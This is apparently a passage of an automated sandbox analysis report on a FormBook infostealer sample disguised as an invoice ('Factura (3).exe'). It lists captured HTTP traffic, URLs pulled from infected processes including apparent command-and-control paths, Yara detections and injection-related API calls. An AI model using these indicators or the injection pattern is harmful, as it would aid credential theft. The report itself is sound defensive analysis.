65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 16 May 2024 15:20:31 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 16 May 2024 15:20:34 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 16 May 2024 15:21:05 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closex-backend: web4X-Frontend: frontend1X-Trace-Id: ti_159389ade035d0ad7fc69ce6881f36b4Content-Encoding: brData Raw: 31 31 35 0d 0a a1 f8 10 00 20 cb d6 ea 94 b4 37 dd f1 26 f4 d7 64 79 c0 b9 0d dc 14 d8 7b 87 fe a3 a8 f0 9c 0b 14 71 6d ba d5 20 e2 df 4b 3d 9b 8b ea a1 e3 9a 7c 04 d0 e2 fd 81 10 0e b6 8e bd 63 48 c8 36 21 91 82 70 d8 12 16 b2 41 78 db 29 8a e4 d1 03 aa 1c b3 28 2f 42 72 83 d6 87 c2 44 79 10 43 10 d6 50 11 67 64 9b ee 11 0c c9 8d 96 71 2e 50 14 fa 29 d8 85 c4 16 fd 4f 9c 74 47 db 93 ac 5b a6 2a db 17 87 0b 76 49 c4 df 04 8a da d1 a8 00 5c 78 20 cb 61 b6 cb 47 f0 66 42 6d 5c 42 e5 a2 a3 e9 25 40 0f 56 62 0c f2 c1 80 09 2c 0f 44 38 11 83 2c 33 55 e1 8c 4c e5 3f 67 ad 78 85 b3 bc 60 b2 2e 73 b3 dc 58 ca 4e 90 f4 34 ec 00 4f 75 73 c0 9e 9c 1f 59 45 11 e4 66 51 26 99 c1 3b e1 bb 97 ed 2f 5b 25 7e e4 b2 d5 e6 0f 3a 0a cd 68 51 e6 58 66 1b f9 d6 b8 64 56 07 83 6f 78 57 48 c8 71 91 1d 9f 46 5e c8 e0 46 eb 73 19 10 02 c0 10 ce be 82 96 04 03 0d 0a 30 0d 0a 0d 0a Data Ascii: 115 7&dy{qm K=|cH6!pAx)(/BrDyCPgdq.P)OtG[*vI\x aGfBm\B%@Vb,D8,3UL?gx`.sXN4OusYEfQ&;/[%~:hQXfdVoxWHqF^Fs0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 16 May 2024 15:21:07 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closex-backend: web4X-Frontend: frontend1X-Trace-Id: ti_c73188c602a93f2d446cefd441e22c7bContent-Encoding: brData Raw: 31 31 35 0d 0a a1 f8 10 00 20 cb d6 ea 94 b4 37 dd f1 26 f4 d7 64 79 c0 b9 0d dc 14 d8 7b 87 fe a3 a8 f0 9c 0b 14 71 6d ba d5 20 e2 df 4b 3d 9b 8b ea a1 e3 9a 7c 04 d0 e2 fd 81 10 0e b6 8e bd 63 48 c8 36 21 91 82 70 d8 12 16 b2 41 78 db 29 8a e4 d1 03 aa 1c b3 28 2f 42 72 83 d6 87 c2 44 79 10 43 10 d6 50 11 67 64 9b ee 11 0c c9 8d 96 71 2e 50 14 fa 29 d8 85 c4 16 fd 4f 9c 74 47 db 93 ac 5b a6 2a db 17 87 0b 76 49 c4 df 04 8a da d1 a8 00 5c 78 20 cb 61 b6 cb 47 f0 66 42 6d 5c 42 e5 a2 a3 e9 25 40 0f 56 62 0c f2 c1 80 09 2c 0f 44 38 11 83 2c 33 55 e1 8c 4c e5 3f 67 ad 78 85 b3 bc 60 b2 2e 73 b3 dc 58 ca 4e 90 f4 34 ec 00 4f 75 73 c0 9e 9c 1f 59 45 11 e4 66 51 26 99 c1 3b e1 bb 97 ed 2f 5b 25 7e e4 b2 d5 e6 0f 3a 0a cd 68 51 e6 58 66 1b f9 d6 b8 64 56 07 83 6f 78 57 48 c8 71 91 1d 9f 46 5e c8 e0 46 eb 73 19 10 02 c0 10 ce be 82 96 04 03 0d 0a 30 0d 0a 0d 0a Data Ascii: 115 7&dy{qm K=|cH6!pAx)(/BrDyCPgdq.P)OtG[*vI\x aGfBm\B%@Vb,D8,3UL?gx`.sXN4OusYEfQ&;/[%~:hQXfdVoxWHqF^Fs0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 16 May 2024 15:21:09 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closex-backend: web4X-Frontend: frontend1X-Trace-Id: ti_58458f13e6035bc12306a06a351c87b4Content-Encoding: brData Raw: 31 31 35 0d 0a a1 f8 10 00 20 cb d6 ea 94 b4 37 dd f1 26 f4 d7 64 79 c0 b9 0d dc 14 d8 7b 87 fe a3 a8 f0 9c 0b 14 71 6d ba d5 20 e2 df 4b 3d 9b 8b ea a1 e3 9a 7c 04 d0 e2 fd 81 10 0e b6 8e bd 63 48 c8 36 21 91 82 70 d8 12 16 b2 41 78 db 29 8a e4 d1 03 aa 1c b3 28 2f 42 72 83 d6 87 c2 44 79 10 43 10 d6 50 11 67 64 9b ee 11 0c c9 8d 96 71 2e 50 14 fa 29 d8 85 c4 16 fd 4f 9c 74 47 db 93 ac 5b a6 2a db 17 87 0b 76 49 c4 df 04 8a da d1 a8 00 5c 78 20 cb 61 b6 cb 47 f0 66 42 6d 5c 42 e5 a2 a3 e9 25 40 0f 56 62 0c f2 c1 80 09 2c 0f 44 38 11 83 2c 33 55 e1 8c 4c e5 3f 67 ad 78 85 b3 bc 60 b2 2e 73 b3 dc 58 ca 4e 90 f4 34 ec 00 4f 75 73 c0 9e 9c 1f 59 45 11 e4 66 51 26 99 c1 3b e1 bb 97 ed 2f 5b 25 7e e4 b2 d5 e6 0f 3a 0a cd 68 51 e6 58 66 1b f9 d6 b8 64 56 07 83 6f 78 57 48 c8 71 91 1d 9f 46 5e c8 e0 46 eb 73 19 10 02 c0 10 ce be 82 96 04 03 0d 0a 30 0d 0a 0d 0a Data Ascii: 115 7&dy{qm K=|cH6!pAx)(/BrDyCPgdq.P)OtG[*vI\x aGfBm\B%@Vb,D8,3UL?gx`.sXN4OusYEfQ&;/[%~:hQXfdVoxWHqF^Fs0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 16 May 2024 15:21:14 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 544Connection: closex-backend: web4X-Frontend: frontend1X-Trace-Id: ti_90d904d2c1f6786a7c2c3ed3ae7772ddData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 4e 6f 20 70 61 67 65 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 73 74 6d 61 69 6c 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 66 69 6c 65 73 74 6f 72 61 67 65 2f 63 73 73 2f 6d 61 69 6e 2e 63 73 73 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 61 20 6e 61 6d 65 3d 22 54 6f 70 22 3e 3c 2f 61 3e 0a 3c 68 31 3e 4e 6f 20 70 61 67 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 57 65 20 63 6f 75 6c 64 6e 27 74 20 66 69 6e 64 20 61 20 70 61 67 65 20 66 6f 72 20 74 68 65 20 6c 69 6e 6b 20 79 6f 75 20 76 69 73 69 74 65 64 2e 20 50 6c 65 61 73 65 20 63 68 65 63 6b 20 74 68 61 74 20 79 6f 75 20 68 61 76 65 20 74 68 65 20 63 6f 72 72 65 63 74 20 6c 69 6e 6b 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a 3c 70 3e 49 66 20 79 6f 75 20 61 72 65 20 74 68 65 20 6f 77 6e 65 72 20 6f 66 20 74 68 69 73 20 64 6f 6d 61 69 6e 2c 20 79 6f 75 20 63 61 6e 20 73 65 74 75 70 20 61 20 70 61 67 65 20 68 65 72 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 73 74 6d 61 69 6c 2e 68 65 6c 70 2f 68 63 2f 65 6e 2d 75 73 2f 61 72 74 69 63 6c 65 73 2f 31 35 30 30 30 30 30 32 38 30 31 34 31 22 3e 63 72 65 61 74 69 6e 67 20 61 20 70 61 67 65 2f 77 65 62 73 69 74 65 20 69 6e 20 79 6f 75 72 20 61 63 63 6f 75 6e 74 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html><head><title>No page found</title><link rel="stylesheet" type="text/css" href="https://www.fastmailusercontent.com/filestorage/css/main.css" /></head><body><a name="Top"></a><h1>No page found</h1><p>We couldn't find a page for the link you visited. Please check that you have the correct link and try again.</p><p>If you are the owner of this domain, you can setup a page here by <a href="https://www.fastmail.help/hc/en-us/articles/1500000280141">creating a page/website in your account</a>.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 18Content-Type: text/plainDate: Thu, 16 May 2024 15:21:20 GMTServer: CaddyConnection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: 404 page not found
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 18Content-Type: text/plainDate: Thu, 16 May 2024 15:21:23 GMTServer: CaddyConnection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: 404 page not found
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 18Content-Type: text/plainDate: Thu, 16 May 2024 15:21:26 GMTServer: CaddyConnection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: 404 page not found
            Source: powershell.exe, 00000009.00000002.1592655805.000001CE21C06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000009.00000002.1563610198.000001CE11DB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000009.00000002.1563610198.000001CE11B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: Amcache.hve.17.drString found in binary or memory: http://upx.sf.net
            Source: powershell.exe, 00000009.00000002.1563610198.000001CE11DB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: KAnMKAQhHABqpRuDRpLtww.exe, 00000018.00000002.3767966509.00000000056FF000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.zwervertjes.be
            Source: KAnMKAQhHABqpRuDRpLtww.exe, 00000018.00000002.3767966509.00000000056FF000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.zwervertjes.be/mcz6/
            Source: chkdsk.exe, 00000017.00000002.3768673482.0000000009A38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: powershell.exe, 00000009.00000002.1563610198.000001CE11B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: chkdsk.exe, 00000017.00000002.3768673482.0000000009A38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: chkdsk.exe, 00000017.00000002.3768673482.0000000009A38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: chkdsk.exe, 00000017.00000002.3768673482.0000000009A38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: powershell.exe, 00000009.00000002.1592655805.000001CE21C06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000009.00000002.1592655805.000001CE21C06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000009.00000002.1592655805.000001CE21C06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: chkdsk.exe, 00000017.00000002.3768673482.0000000009A38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: chkdsk.exe, 00000017.00000002.3768673482.0000000009A38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: chkdsk.exe, 00000017.00000002.3768673482.0000000009A38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: powershell.exe, 00000009.00000002.1563610198.000001CE11DB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: chkdsk.exe, 00000017.00000002.3764249613.0000000004F75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: chkdsk.exe, 00000017.00000002.3764249613.0000000004F75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: chkdsk.exe, 00000017.00000003.1751331021.0000000009963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: chkdsk.exe, 00000017.00000002.3764249613.0000000004F75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: chkdsk.exe, 00000017.00000002.3764249613.0000000004F75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: chkdsk.exe, 00000017.00000002.3764249613.0000000004F75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: chkdsk.exe, 00000017.00000002.3764249613.0000000004F75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: powershell.exe, 00000009.00000002.1592655805.000001CE21C06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: chkdsk.exe, 00000017.00000002.3766720594.00000000060E8000.00000004.10000000.00040000.00000000.sdmp, KAnMKAQhHABqpRuDRpLtww.exe, 00000018.00000002.3766204817.0000000003968000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.allinone24.shop/mcz6/?-xl=hBllB6kp4D1dBFK&1Joh=iV05GdjlKKe2FocmpbDy7295TkLfoCrmYroAP0qP2
            Source: chkdsk.exe, 00000017.00000002.3768673482.0000000009A38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: chkdsk.exe, 00000017.00000002.3766720594.0000000006D78000.00000004.10000000.00040000.00000000.sdmp, KAnMKAQhHABqpRuDRpLtww.exe, 00000018.00000002.3766204817.00000000045F8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.fastmail.help/hc/en-us/articles/1500000280141
            Source: chkdsk.exe, 00000017.00000002.3766720594.0000000006D78000.00000004.10000000.00040000.00000000.sdmp, KAnMKAQhHABqpRuDRpLtww.exe, 00000018.00000002.3766204817.00000000045F8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.fastmailusercontent.com/filestorage/css/main.css
            Source: chkdsk.exe, 00000017.00000002.3768491954.0000000007F10000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000017.00000002.3766720594.000000000722E000.00000004.10000000.00040000.00000000.sdmp, KAnMKAQhHABqpRuDRpLtww.exe, 00000018.00000002.3766204817.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: KAnMKAQhHABqpRuDRpLtww.exe, 00000018.00000002.3766204817.0000000003C8C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.strato.de

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 14.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000017.00000002.3762446362.0000000000750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.1567061985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.3763198467.0000000004C60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000002.3767966509.0000000005690000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.1567476017.0000000004EA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.3763434495.0000000004CA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.3765581887.00000000059F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.1574530292.0000000007EC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 14.2.csc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 14.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000017.00000002.3762446362.0000000000750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000E.00000002.1567061985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000017.00000002.3763198467.0000000004C60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000018.00000002.3767966509.0000000005690000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000E.00000002.1567476017.0000000004EA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000017.00000002.3763434495.0000000004CA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000014.00000002.3765581887.00000000059F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000E.00000002.1574530292.0000000007EC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Very long command line found
            Source: C:\Users\user\Desktop\Factura (3).exeProcess created: Commandline size = 4239
            Source: C:\Users\user\Desktop\Factura (3).exeProcess created: Commandline size = 4239Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0042B113 NtClose,14_2_0042B113
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E35C0 NtCreateMutant,LdrInitializeThunk,14_2_053E35C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E2DF0 NtQuerySystemInformation,LdrInitializeThunk,14_2_053E2DF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E2C70 NtFreeVirtualMemory,LdrInitializeThunk,14_2_053E2C70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E2B60 NtClose,LdrInitializeThunk,14_2_053E2B60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E4650 NtSuspendThread,14_2_053E4650
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E3010 NtOpenDirectoryObject,14_2_053E3010
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E3090 NtSetValueKey,14_2_053E3090
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E4340 NtSetContextThread,14_2_053E4340
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E2D30 NtUnmapViewOfSection,14_2_053E2D30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E2D10 NtMapViewOfSection,14_2_053E2D10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E3D10 NtOpenProcessToken,14_2_053E3D10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E2D00 NtSetInformationFile,14_2_053E2D00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E3D70 NtOpenThread,14_2_053E3D70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E2DB0 NtEnumerateKey,14_2_053E2DB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E2DD0 NtDelayExecution,14_2_053E2DD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E2C00 NtQueryInformationProcess,14_2_053E2C00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E2C60 NtCreateKey,14_2_053E2C60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E2CA0 NtQueryInformationToken,14_2_053E2CA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E2CF0 NtOpenProcess,14_2_053E2CF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E2CC0 NtQueryVirtualMemory,14_2_053E2CC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E2F30 NtCreateSection,14_2_053E2F30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E2F60 NtCreateProcessEx,14_2_053E2F60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E2FB0 NtResumeThread,14_2_053E2FB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E2FA0 NtQuerySection,14_2_053E2FA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E2F90 NtProtectVirtualMemory,14_2_053E2F90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E2FE0 NtCreateFile,14_2_053E2FE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E2E30 NtWriteVirtualMemory,14_2_053E2E30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E2EA0 NtAdjustPrivilegesToken,14_2_053E2EA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E2E80 NtReadVirtualMemory,14_2_053E2E80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E2EE0 NtQueueApcThread,14_2_053E2EE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E39B0 NtGetContextThread,14_2_053E39B0
